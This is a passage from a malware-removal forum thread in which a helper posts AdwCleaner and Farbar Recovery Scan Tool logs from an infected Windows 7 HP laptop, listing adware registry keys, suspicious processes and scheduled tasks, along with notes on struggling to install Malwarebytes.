PUP.Optional.Legacy             HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
PUP.Optional.Legacy             HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{311B58DC-A4DC-4B04-B1B5-60299AD3D803}
PUP.Optional.Legacy             HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
PUP.Optional.Legacy             HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{66516A07-F617-488A-90CF-4E690CFB3C5F}
PUP.Optional.Legacy             HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{D4027C7F-154A-4066-A1AD-4243D8127440}
PUP.Optional.Legacy             HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
PUP.Optional.Legacy             HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
PUP.Optional.Legacy             HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{311B58DC-A4DC-4B04-B1B5-60299AD3D803}
PUP.Optional.Legacy             HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
PUP.Optional.Legacy             HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{66516A07-F617-488A-90CF-4E690CFB3C5F}
PUP.Optional.Legacy             HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{D4027C7F-154A-4066-A1AD-4243D8127440}
PUP.Optional.Legacy             HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
PUP.Optional.Legacy             HKU\S-1-5-18\Software\AVG Secure Search
PUP.Optional.Legacy             HKU\S-1-5-18\Software\AppDataLow\Software\AVG Security Toolbar
PUP.Optional.Legacy             HKU\S-1-5-18\Software\IGearSettings
PUP.Optional.Legacy             HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
PUP.Optional.Legacy             HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{311B58DC-A4DC-4B04-B1B5-60299AD3D803}
PUP.Optional.Legacy             HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
PUP.Optional.Legacy             HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{66516A07-F617-488A-90CF-4E690CFB3C5F}
PUP.Optional.Legacy             HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{D4027C7F-154A-4066-A1AD-4243D8127440}
PUP.Optional.Legacy             HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
PUP.Optional.Legacy             HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
PUP.Optional.Legacy             HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{311B58DC-A4DC-4B04-B1B5-60299AD3D803}
PUP.Optional.Legacy             HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{3CA2F312-6F6E-4B53-A66E-4E65E497C8C0}
PUP.Optional.Legacy             HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{66516A07-F617-488A-90CF-4E690CFB3C5F}
PUP.Optional.Legacy             HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{D4027C7F-154A-4066-A1AD-4243D8127440}
PUP.Optional.Legacy             HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
PUP.Optional.MySearchDial       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7158081D-DF25-4E71-BC14-844441C6B587}
PUP.Optional.MySearchDial       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7158081D-DF25-4E71-BC14-844441C6B587}
PUP.Optional.MySearchDial       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\mysearchdial
PUP.Optional.MySearchDial       HKLM\Software\Wow6432Node\mysearchdial
PUP.Optional.MyWebSearch        HKLM\Software\Wow6432Node\MozillaPlugins\@ei.TotalRecipeSearch_14.com\Plugin
PUP.Optional.PCFixCleaner       HKCU\Software\FixCleaner
PUP.Optional.PCFixCleaner       HKLM\Software\Wow6432Node\FixCleaner
PUP.Optional.PCKeeper           HKCU\Software\Essentware
PUP.Optional.PCKeeper           HKLM\Software\Essentware
PUP.Optional.PriceGong          HKCU\Software\AppDataLow\Software\PriceGong
PUP.Optional.ProductSetup.A     HKCU\Software\PRODUCTSETUP
PUP.Optional.SearchManager      HKCU\Software\ProductSetup\Uninstall\0B2U2Z1P0F1P1G1R1P1V0A1Q1Q0O1G
PUP.Optional.SearchManager      HKCU\Software\ProductSetup\Uninstall\0S1P1T1C1R1MtT0P1C1F2X1L1Q1P1QtT1S2UtT0Y1T1M1F1F
PUP.Optional.SlimCleanerPlus    HKCU\Software\SlimWare Utilities Inc
PUP.Optional.SlimCleanerPlus    HKLM\Software\Wow6432Node\SLIMWARE UTILITIES, INC.
PUP.Optional.SlimCleanerPlus    HKLM\Software\Wow6432Node\SlimWare Utilities Inc
PUP.Optional.SuperOptimizer     HKCU\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
PUP.Optional.SuperOptimizer     HKLM\Software\Wow6432Node\{1146AC44-2F03-4431-B4FD-889BC837521F}
PUP.Optional.SuperOptimizer     HKLM\Software\Wow6432Node\{6791A2F3-FC80-475C-A002-C014AF797E9C}
PUP.Optional.SuperOptimizer     HKU\.DEFAULT\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
PUP.Optional.SuperOptimizer     HKU\S-1-5-18\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
PUP.Optional.SuperOptimizer     HKU\S-1-5-19\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
PUP.Optional.SuperOptimizer     HKU\S-1-5-20\Software\AppDataLow\{1146AC44-2F03-4431-B4FD-889BC837521F}
PUP.Optional.SweetIM            HKLM\Software\Classes\URLSearchHook.ToolbarURLSearchHook
PUP.Optional.TidyNetwork        HKCU\Software\AppDataLow\Software\TidyNetwork
PUP.Optional.VisualBee          HKCU\Software\visualbee
PUP.Optional.VisualBee          HKLM\Software\Wow6432Node\visualbee
 
***** [ Chromium (and derivatives) ] *****
 
No malicious Chromium entries found.
 
***** [ Chromium URLs ] *****
 
No malicious Chromium URLs found.
 
***** [ Firefox (and derivatives) ] *****
 
No malicious Firefox entries found.
 
***** [ Firefox URLs ] *****
 
No malicious Firefox URLs found.
 
***** [ Hosts File Entries ] *****
 
No malicious hosts file entries found.
 
***** [ Preinstalled Software ] *****
 
Preinstalled.CyberLinkLabelPrint   Folder   C:\Program Files (x86)\CYBERLINK\LABELPRINT 
Preinstalled.CyberLinkLabelPrint   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243} 
Preinstalled.CyberLinkLabelPrint   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{C59C179C-668D-49A9-B6EA-0121CCFC1243} 
Preinstalled.HPCeement   Registry   HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\HPCeeScheduleForJay 
Preinstalled.HPHealthCheck   Folder   C:\Program Files (x86)\HEWLETT-PACKARD\HP HEALTH CHECK 
Preinstalled.HPMediaSmart   Folder   C:\Program Files (x86)\HEWLETT-PACKARD\MEDIASMART\CINEMANOW 
Preinstalled.HPMediaSmart   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D} 
Preinstalled.HPMediaSmart   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{01FB4998-33C4-4431-85ED-079E3EEFE75D} 
Preinstalled.HPMediaSmart   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{120262A6-7A4B-4889-AE85-F5E5688D3683} 
Preinstalled.HPSupportAssistant   Folder   C:\HP\SUPPORT 
Preinstalled.HPSupportAssistant   Folder   C:\Program Files (x86)\HEWLETT-PACKARD\HP CUSTOMER FEEDBACK 
Preinstalled.HPSupportAssistant   Folder   C:\Program Files (x86)\HEWLETT-PACKARD\HP SUPPORT FRAMEWORK 
Preinstalled.HPSupportAssistant   Folder   C:\ProgramData\HEWLETT-PACKARD\HP SUPPORT FRAMEWORK 
Preinstalled.HPSupportAssistant   Folder   C:\Users\Marilyn\AppData\Local\HEWLETT-PACKARD\HP SUPPORT FRAMEWORK 
Preinstalled.HPSupportAssistant   Folder   C:\Users\Marilyn\AppData\Local\VirtualStore\ProgramData\HEWLETT-PACKARD\HP SUPPORT FRAMEWORK 
Preinstalled.HPSupportAssistant   Folder   C:\Users\Marilyn\AppData\Roaming\HEWLETT-PACKARD\HP SUPPORT FRAMEWORK 
Preinstalled.HPSupportAssistant   Folder   C:\Users\lindag\AppData\Local\HEWLETT-PACKARD\HP SUPPORT FRAMEWORK 
Preinstalled.HPSupportAssistant   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{08DB3902-2CE0-474D-BCE3-0177766CE9F1} 
Preinstalled.HPSupportAssistant   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{6F44AF95-3CDE-4513-AD3F-6D45F17BF324} 
Preinstalled.HPSupportAssistant   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{CA43FE4F-9FF2-4AD7-88F0-CC3BAC17B226} 
Preinstalled.HPSupportAssistant   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{CF1A69F1-4335-4322-A137-235E3AE36BB0} 
Preinstalled.HPSupportAssistant   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{E92D47A1-D27D-430A-8368-0BAFD956507D} 
Preinstalled.LenovoPower2Go   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658} 
Preinstalled.LenovoPower2Go   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{40BF1E83-20EB-11D8-97C5-0009C5020658} 
Preinstalled.WildTangentGamesBundle   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\WildTangentGDF-hp-darkorbit 
Preinstalled.WildTangentGamesBundle   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\WildTangentGDF-hp-seafight 
Preinstalled.WildTangentGamesBundle   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\WildTangentGDF-hp-worldofwarcraft 
Preinstalled.WildTangentGamesBundle   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\WildTangentGameProvider-hp-genres 
 
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S00].txt ##########
 
======================================================================================================
 
Not able to install Malwarebytes yet. When I try tyo open the folder MBSetup.exe is in it gets closed immediately. Trying in Safe Mode but the install hangs after a bit. If I can't get it installed I go ahead and run FarBar and post that log.

Rich
 

Die with memories, not dreams. – Unknown


#4 Ztruker

Ztruker

    WTT Technical Elder

  • Tech Team
  • 8,292 posts
  • Interests:Helping people fix MS Windows related computer problems of all kinds.

    Waking each morning to see the green side of the Earth!

Posted 28 March 2022 - 09:32 AM

Tried installing Malwarebytes from the link you gave me and get a different problem.

 

MBAM-Setup.JPG

 

When I click on the Yes button, Firefox opens then closes so I don't get to see what the info is.

 

Edit: I made Internet Explorer the default browser and was able to get to the Malwarebytes info page which led me to the Microsoft Updates Catalog for the 2019 SHA-2 Code Signing support update. I'm installing it now and hopefully that will let me install Malwarebytes.

 

Edit#2: Got MBAM installed but can't run it yet. Activated Administrator account, will see if I can run it from there or from Safe Mode.


Edited by Ztruker, 28 March 2022 - 10:29 AM.

Rich
 

Die with memories, not dreams. – Unknown


#5 Ztruker

Ztruker

    WTT Technical Elder

  • Tech Team
  • 8,292 posts
  • Interests:Helping people fix MS Windows related computer problems of all kinds.

    Waking each morning to see the green side of the Earth!

Posted 28 March 2022 - 10:28 AM

Farbar results:

 

FRST.txt

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 28-03-2022
Ran by Marilyn (administrator) on MARILYN-HP (Hewlett-Packard HP G56 Notebook PC) (28-03-2022 11:35:32)
Running from C:\Users\Marilyn\Desktop
Loaded Profiles: Marilyn
Platform: Microsoft Windows 7 Home Premium  Service Pack 1 (X64) Language: English (United States)
Default browser: FF
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(explorer.exe ->) (Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Piriform Software Ltd -> Piriform Software Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(rundll32.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(services.exe ->) (Andrea Electronics -> Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(services.exe ->) (Apple Inc. -> Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(services.exe ->) (Cisco WebEx LLC -> Cisco WebEx LLC) C:\Windows\SysWOW64\atashost.exe
(services.exe ->) (Hewlett-Packard Company -> Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(services.exe ->) (voidtools -> voidtools) C:\Program Files\Everything\Everything.exe <2>
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wisptis.exe
(taskeng.exe ->) () [File not signed] C:\Windows\Temp\conhoy.exe <2>
(taskeng.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe <2>
(taskeng.exe ->) (www.google.com) [File not signed] C:\Windows\inf\aspnet\lsma22.exe
 
==================== Registry (Whitelisted) ===================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2281256 2012-02-02] (Synaptics Incorporated -> Synaptics Incorporated)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6245408 2010-05-25] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [Everything] => C:\Program Files\Everything\Everything.exe [2240288 2019-02-04] (voidtools -> voidtools)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [35888256 2022-03-10] (Piriform Software Ltd -> Piriform Software Ltd)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\MountPoints2: F - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\MountPoints2: {04f7e41a-a707-11e2-b587-60eb6909b7df} - F:\VerizonSWUpgradeAssistantLauncher.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\MountPoints2: {1addf19c-3bd0-11e5-b90f-60eb6909b7df} - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\MountPoints2: {39bee1c8-8691-11e7-973b-60eb6909b7df} - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\MountPoints2: {ead950e8-3187-11e5-8649-60eb6909b7df} - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [HPAdvisorDock] => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Dock\HPAdvisorDock.exe (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [swg] => "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [PCKeeperLive] => "C:\Program Files\Essentware\PCKeeper\PCKeeper.exe" /autorun (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [KGShareApp] => C:\Program Files (x86)\Kodak\KODAK Share Button App\KGShare_App.exe (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [HLBackupScheduler] => C:\Program Files\Verizon Cloud\Verizon Cloud Service.exe [6415168 2015-02-10] (Hyperlync Technologies Inc. -> )
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [HP Deskjet 3050A J611 series (NET)] => "C:\Program Files\HP\HP Deskjet 3050A J611 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN18A481V305PJ:NW" -scfn "HP Deskjet 3050A J611 series (NET)" -AutoStart 1 (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [HP Deskjet 3050A J611 series (NET) #2] => "C:\Program Files\HP\HP Deskjet 3050A J611 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN28P6FM2905PJ:NW" -scfn "HP Deskjet 3050A J611 series (NET) #2" -AutoStart 1 (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [AGupdate] => C:\Program Files (x86)\AppGraffiti\AGupdate.exe [894048 2013-03-19] (Omega Partners LTD -> Omega Partners Ltd)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [HP ENVY 7640 series (NET)] => "C:\Program Files\HP\HP ENVY 7640 series\Bin\ScanToPCActivationApp.exe" -deviceID "TH51627030063T:NW" -scfn "HP ENVY 7640 series (NET)" -AutoStart 1 (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\MountPoints2: F - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\MountPoints2: {04f7e41a-a707-11e2-b587-60eb6909b7df} - F:\VerizonSWUpgradeAssistantLauncher.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\MountPoints2: {ead950e8-3187-11e5-8649-60eb6909b7df} - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [HPAdvisorDock] => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Dock\HPAdvisorDock.exe (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [PCKeeperLive] => "C:\Program Files\Essentware\PCKeeper\PCKeeper.exe" /autorun (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [swg] => "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [KGShareApp] => C:\Program Files (x86)\Kodak\KODAK Share Button App\KGShare_App.exe (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [HLBackupScheduler] => C:\Program Files\Verizon Cloud\Verizon Cloud Service.exe [6415168 2015-02-10] (Hyperlync Technologies Inc. -> )
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [HP Deskjet 3050A J611 series (NET)] => "C:\Program Files\HP\HP Deskjet 3050A J611 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN18A481V305PJ:NW" -scfn "HP Deskjet 3050A J611 series (NET)" -AutoStart 1 (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [HP Deskjet 3050A J611 series (NET) #2] => "C:\Program Files\HP\HP Deskjet 3050A J611 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN28P6FM2905PJ:NW" -scfn "HP Deskjet 3050A J611 series (NET) #2" -AutoStart 1 (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [AGupdate] => C:\Program Files (x86)\AppGraffiti\AGupdate.exe [894048 2013-03-19] (Omega Partners LTD -> Omega Partners Ltd)
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [HP ENVY 7640 series (NET)] => "C:\Program Files\HP\HP ENVY 7640 series\Bin\ScanToPCActivationApp.exe" -deviceID "TH51627030063T:NW" -scfn "HP ENVY 7640 series (NET)" -AutoStart 1 (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\MountPoints2: F - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\MountPoints2: {04f7e41a-a707-11e2-b587-60eb6909b7df} - F:\VerizonSWUpgradeAssistantLauncher.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\MountPoints2: {ead950e8-3187-11e5-8649-60eb6909b7df} - F:\VZW_Software_upgrade_assistant.exe
HKLM\...\Print\Monitors\HP a011 Status Monitor: C:\Windows\system32\hpinkstsa011LM.dll [354152 2011-06-08] (Hewlett Packard -> Hewlett-Packard Co.)
HKLM\...\Print\Monitors\HP DC11 Status Monitor: C:\Windows\system32\hpinkstsDC11LM.dll [336904 2014-08-01] (Hewlett Packard -> Hewlett-Packard Development Company, LP)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{2D46B6DC-2207-486B-B523-A557E6D54B47}] -> C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\91.0.4472.106\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel
HKLM\Software\Microsoft\Active Setup\Installed Components: [{A509B1FF-37FF-4bFF-8CFF-4F3A747040FF}] -> C:\Windows\system32\advpack.dll [2009-07-13] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{2D46B6DC-2207-486B-B523-A557E6D54B47}] -> C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{A509B1FF-37FF-4bFF-8CFF-4F3A747040FF}] -> C:\Windows\SysWOW64\advpack.dll [2009-07-13] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\...\Authentication\Credential Providers: [{F8A0B131-5F68-486c-8040-7E8FC3C85BB6}] -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDCREDPROV.DLL [2009-08-18] (Microsoft Corporation -> Microsoft Corporation)
IFEO\uihost32.exe: [Debugger] ntsd -d
IFEO\uihost64.exe: [Debugger] ntsd -d
IFEO\vid001.exe: [Debugger] ntsd -d
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
 
==================== Scheduled Tasks (Whitelisted) ============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {02944AD5-564B-4BE1-91BF-3D4832B6DD42} - System32\Tasks\Mozilla\Firefox Background Update 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\firefox.exe --MOZ_LOG sync,prependheader,timestamp,append,maxsize:1,Dump:5 --MOZ_LOG_FILE C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\backgroundupdate.moz_log --backgroundtask backgroundupdate
Task: {0755F16F-16EE-419E-B0E7-0CC9CA968B96} - System32\Tasks\Information-codedownloader => C:\Program Files (x86)\Information\Information-codedownloader.exe /reinstallapp /runfrom=task /agentregpath='Information' /appid=50368 /srcid='000972' /subid='verticals-shopping,intext,pops,ads,' /zdata='0' /bic=07DDEFF8A66544268EF5CBBA1DF83E80IE /verifier=2b16ecc477d558dd9a11ec235ae5ad0f /installerversion=1_34_2_13 /installerfullversion=1.34.2.13 /installationtime=1395509351 /statsdomain=http://stats.srvstatsdata.com/errorsdomain=http://errors.srvstatsdata.com /codedownloaddomain=http://app-static.crossrider.com /defbro=ie /allusers /autoupdateulr='http://update.srvstatsdata.com/ie_code_agent_updates/{CAMP_ID}/update.json' /runfrom='task' /externallog='' (No File) <==== ATTENTION
Task: {0D23653C-6BD6-4C2E-9B7B-7CDE28991827} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe /PBDADiscovery (No File)
Task: {130F0ABF-F04E-403D-9072-46195AC3C09E} - System32\Tasks\HP AR Program Upload - 5c0f950a1bac498fa00becd99f6716457d4ebca62a29425ca9ed17aa3deb9a58 => C:\Program Files\HP\HP ENVY 7640 series\bin\HPRewards.exe -N 5c0f950a1bac498fa00becd99f6716457d4ebca62a29425ca9ed17aa3deb9a58 -mode Scheduled (No File)
Task: {13E5D543-D30F-47EB-B157-AA513D0E504D} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0) (No File)
Task: {1F798407-258E-40E4-88D5-09E365947CCC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater\HPSFUpdater.exe [740224 2012-11-20] (Hewlett-Packard Company -> Hewlett-Packard)
Task: {21EB5A67-D52B-4B3A-A5A1-EBBE59ACE82C} - System32\Tasks\CCleanerSkipUAC - Marilyn => C:\Program Files\CCleaner\CCleaner.exe [30053504 2022-03-10] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {25C3FE4E-7C48-447D-BAC5-141069528E0A} - System32\Tasks\Information-enabler => C:\Program Files (x86)\Information\Information-enabler.exe /enablebho /agentregpath='Information' /appid=50368 /srcid='000972' /subid='verticals-shopping,intext,pops,ads,' /zdata='0' /bic=07DDEFF8A66544268EF5CBBA1DF83E80IE /verifier=2b16ecc477d558dd9a11ec235ae5ad0f /installerversion=1_34_2_13 /installationtime=1395509351 /statsdomain=http://stats.srvstatsdata.com/errorsdomain=http://errors.srvstatsdata.com /bhoguid=11111111-1111-1111-1111-110511031168 /defbro=ie /allusers /autoupdateulr='http://update.srvstatsdata.com/ie_enable_agent_updates/{CAMP_ID}/update.json' /runfrom='task' /externallog='' (No File) <==== ATTENTION
Task: {283FA5F3-05D9-4E45-8612-CC169745945D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Total Care Tune-Up => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPTuneUp.exe [17976 2011-03-22] (Hewlett-Packard Company -> Hewlett-Packard Company)
Task: {28AA66E5-16C3-4EC8-9431-3904FE03FF88} - System32\Tasks\Information-chromeinstaller => C:\Program Files (x86)\Information\Information-chromeinstaller.exe 